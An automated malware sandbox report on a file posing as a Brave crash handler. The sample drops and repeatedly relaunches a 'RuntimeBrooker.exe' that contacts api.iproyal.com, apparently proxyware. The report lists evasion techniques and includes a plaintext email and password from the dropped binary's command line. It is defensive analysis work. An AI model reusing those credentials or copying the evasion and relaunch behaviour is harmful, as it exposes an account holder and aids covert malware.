Edit tour

Windows Analysis Report
BraveCrashHandler64.exe

Overview

General Information

Sample name:	BraveCrashHandler64.exe
Analysis ID:	1431608
MD5:	d56a7d817c035803b7538f17cc2ead45
SHA1:	19def2b2a35f4df889a19e653f20cdad0861a1e6
SHA256:	2be6c328300e35758dbf7a0aeaaa139cdf83c1f3d62e6aac7abc237a9c8d052c
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found direct / indirect Syscall (likely to bypass EDR)

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file has nameless sections

Query firmware table information (likely to detect VMs)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Abnormal high CPU Usage

Checks for debuggers (devices)

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Use Short Name Path in Command Line

Uses 32bit PE files

Classification

Process Tree

System is w10x64

BraveCrashHandler64.exe (PID: 1260 cmdline: "C:\Users\user\Desktop\BraveCrashHandler64.exe" MD5: D56A7D817C035803B7538F17CC2EAD45)

cmd.exe (PID: 3416 cmdline: cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\12605RR4.bat" "C:\Users\user\Desktop\BraveCrashHandler64.exe"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 1240 cmdline: chcp 1252 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

tasklist.exe (PID: 1792 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 2960 cmdline: findstr /i "RuntimeBrooker.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

RuntimeBrooker.exe (PID: 7088 cmdline: "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos MD5: 7D1082288A0D3F0467C1D57DE7471036)

tasklist.exe (PID: 4704 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 6660 cmdline: findstr /i "RuntimeBrooker.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

RuntimeBrooker.exe (PID: 4204 cmdline: "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos MD5: 7D1082288A0D3F0467C1D57DE7471036)

tasklist.exe (PID: 1352 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 2020 cmdline: findstr /i "RuntimeBrooker.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

RuntimeBrooker.exe (PID: 3060 cmdline: "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos MD5: 7D1082288A0D3F0467C1D57DE7471036)

tasklist.exe (PID: 5488 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 1652 cmdline: findstr /i "RuntimeBrooker.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

RuntimeBrooker.exe (PID: 1424 cmdline: "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos MD5: 7D1082288A0D3F0467C1D57DE7471036)

tasklist.exe (PID: 6056 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 6992 cmdline: findstr /i "RuntimeBrooker.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

RuntimeBrooker.exe (PID: 3672 cmdline: "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos MD5: 7D1082288A0D3F0467C1D57DE7471036)

tasklist.exe (PID: 6540 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 2824 cmdline: findstr /i "RuntimeBrooker.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

RuntimeBrooker.exe (PID: 6768 cmdline: "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos MD5: 7D1082288A0D3F0467C1D57DE7471036)

tasklist.exe (PID: 2960 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 2120 cmdline: findstr /i "RuntimeBrooker.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

RuntimeBrooker.exe (PID: 4644 cmdline: "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos MD5: 7D1082288A0D3F0467C1D57DE7471036)

tasklist.exe (PID: 3908 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 3812 cmdline: findstr /i "RuntimeBrooker.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

RuntimeBrooker.exe (PID: 7088 cmdline: "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos MD5: 7D1082288A0D3F0467C1D57DE7471036)

tasklist.exe (PID: 6788 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 4736 cmdline: findstr /i "RuntimeBrooker.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

RuntimeBrooker.exe (PID: 3916 cmdline: "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos MD5: 7D1082288A0D3F0467C1D57DE7471036)

tasklist.exe (PID: 6224 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 2408 cmdline: findstr /i "RuntimeBrooker.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

RuntimeBrooker.exe (PID: 2060 cmdline: "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos MD5: 7D1082288A0D3F0467C1D57DE7471036)

tasklist.exe (PID: 2052 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 1460 cmdline: findstr /i "RuntimeBrooker.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

RuntimeBrooker.exe (PID: 1848 cmdline: "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos MD5: 7D1082288A0D3F0467C1D57DE7471036)

cleanup

Sigma Signatures

System Summary

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\12605RR4.bat" "C:\Users\user\Desktop\BraveCrashHandler64.exe"", CommandLine: cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\12605RR4.bat" "C:\Users\user\Desktop\BraveCrashHandler64.exe"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\BraveCrashHandler64.exe", ParentImage: C:\Users\user\Desktop\BraveCrashHandler64.exe, ParentProcessId: 1260, ParentProcessName: BraveCrashHandler64.exe, ProcessCommandLine: cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\12605RR4.bat" "C:\Users\user\Desktop\BraveCrashHandler64.exe"", ProcessId: 3416, ProcessName: cmd.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: BraveCrashHandler64.exe

Avira: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: BraveCrashHandler64.exe

Joe Sandbox ML: detected

Source: BraveCrashHandler64.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: api.iproyal.com

Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: RuntimeBrooker.exe, 00000007.00000002.1331226063.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00013E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1397301998.000000C0001F8000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1429024893.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1492035852.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.certigna.fr/certignarootca.crl
Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: RuntimeBrooker.exe, 00000007.00000002.1331226063.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00013E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1397301998.000000C0001F8000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1429024893.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1492035852.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.certigna.fr/certignarootca.crlhttp://crl.dhimyotis.com/certignarootca.crl
Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: RuntimeBrooker.exe, 00000007.00000002.1330810409.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1396266752.000000C0000AC000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1428365569.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1491215219.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: RuntimeBrooker.exe, 00000007.00000002.1330810409.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1396266752.000000C0000AC000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1428365569.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1491215219.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crlhttp://crl.comodoca.com/COMODOCertificationAuthori
Source: RuntimeBrooker.exe, 00000007.00000002.1330810409.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1396266752.000000C0000AC000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1428365569.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1491215219.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: RuntimeBrooker.exe, 00000007.00000002.1331226063.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00013E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1397301998.000000C0001F8000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1429024893.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1492035852.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
Source: RuntimeBrooker.exe, 00000007.00000002.1330810409.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1396266752.000000C000090000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1428365569.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1491215219.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl
Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: RuntimeBrooker.exe, 00000007.00000002.1330810409.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1396266752.000000C000090000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1428365569.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1491215219.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl
Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: RuntimeBrooker.exe, 00000007.00000002.1330810409.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1396266752.000000C000090000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1428365569.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1491215219.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl=
Source: RuntimeBrooker.exe, 00000007.00000002.1330810409.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1396266752.000000C000090000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1428365569.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1491215219.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: RuntimeBrooker.exe, 00000007.00000002.1330810409.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1396266752.000000C000090000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1428365569.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1491215219.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: RuntimeBrooker.exe, 00000007.00000002.1330810409.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1396266752.000000C000090000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1428365569.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1491215219.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crlGo
Source: RuntimeBrooker.exe, 00000007.00000002.1330810409.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1396266752.000000C0000A2000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1428365569.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1491215219.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.es
